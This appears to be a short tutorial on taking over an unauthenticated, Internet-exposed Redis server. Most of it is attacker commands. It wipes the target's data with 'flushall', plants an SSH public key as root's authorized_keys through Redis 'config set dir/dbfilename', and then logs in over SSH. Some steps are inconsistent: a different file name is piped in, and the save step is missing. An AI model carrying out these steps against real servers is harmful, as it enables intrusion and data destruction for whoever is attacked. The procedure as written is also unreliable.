Redis, is an open source, a data structure tool that can be used as an in-memory distributed database, message broker or cache.
Since it is designed to be accessed inside trusted environments, it should not be exposed on the Internet.
Redis’ are bind to public interface and even has no password authentication protection.
If Redis runs with the root account or not, attackers can write an SSH public key file to the root account, directly logging on to the victim server through SSH.
This may allow hackers to gain server privileges, delete or steal data.
Several times Redis will be configured to be accessible anonymously. In this case you won’t need to use any username and password. Talking to Redis service and execute the info command, it will let you know a lot of information about the server: SO running, Clients, memory…
On our machine ( Attacker Machine ) we need to install Redis tools:
sudo apt-get install redis-tools
We are going to create new ssh keys to we need to be inside our ssh folder:
$ ssh-keygen -t rsa
$ (echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > test.txt
Now test.txt is just our public key but with newlines. We can write inside the memory of Redis using redis-cli:
$ redis-cli -h 192.168.1.15 flushall
$ cat foo.txt | redis-cli -h 192.168.1.15 -x set keyz
Now to dump our memory content into the authorized_keys file:
$ redis-cli -h 192.168.1.15
192.168.1.15:6379> config get dir
192.168.1.15:6379> config set dir “/var/lib/redis/.ssh”
192.168.1.15:6379> config get dbfilename
192.168.1.15:6379> config set dbfilename “authorized_keys”
Now the last step is to ssh to the target machine:
$ ssh -i id_rsa firstname.lastname@example.org